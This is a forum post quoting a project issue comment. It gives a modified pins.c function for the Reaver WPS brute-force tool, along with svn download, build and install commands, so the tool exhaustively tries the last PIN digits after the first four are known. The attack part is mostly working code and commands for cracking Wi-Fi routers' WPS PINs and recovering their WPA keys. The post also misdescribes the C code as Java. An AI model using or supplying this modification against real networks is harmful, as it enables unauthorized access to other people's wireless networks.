According to the original author of the code (written in JAVA, by the way...), it is possible to get around the 99.99% issue by modifying a few lines of code.... you can follow it at this link:
http://code.google.com/p/reaver-wps/issues/detail?id=195#c41

Comment 41 by stefano....@gmail.com, Oct 22, 2012
I'm proud of you Tystar!
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.
Assumptions:
-the router accepts WPS transactions, so it is not continuously giving you "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve this information using the original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout
http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
open the file /root/reaver-wps-read-only/src/pins.c with a text editor
(save a copy; you will need it to reinstall the original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):
/* EXHAUSTIVE MOD. init */
/*
 * In these lines trivial modifications are applied over the original code.
 * These lines have to be considered for demonstration purposes only.
 * WPA PSK retrieval is not guaranteed.
 *
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 0;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
    char *key = NULL, *pin = NULL;
    int pin_len = PIN_SIZE + 1;

    pin = malloc(pin_len);
    key = malloc(pin_len);
    if(pin && key)
    {
        memset(key, 0, pin_len);
        memset(pin, 0, pin_len);

        /* Generate a 7-digit pin */
        snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));

        /* Append last digit */
        snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);
        free(key);

        if(exhaustive_last_digit == 0)
        {
            if(exhaustive_index == 999)
            {
                cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
                /* Clean up and get out */
                globule_deinit();
                exit(EXIT_FAILURE);
            }
            exhaustive_index++;
            exhaustive_last_digit = 9;
        }
        else
        {
            exhaustive_last_digit--;
        }
    }

    return pin;
}
/* EXHAUSTIVE MOD. end */
-the current reaver has to be uninstalled:
cd /root/reaver-wps-read-only/src
./configure
make distclean
-the modified reaver has to be installed:
cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123, where "0123" are the first 4 digits of the pin.
if you don't specify these 4 digits, the worst case will take at least 10 years (3 sec/pin * 10^8 pins).
using the right 4 digits, the worst case will take at least 10 hours (3 sec/pin * 10^4).
to reinstall the original reaver:
substitute the modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with the same commands as above.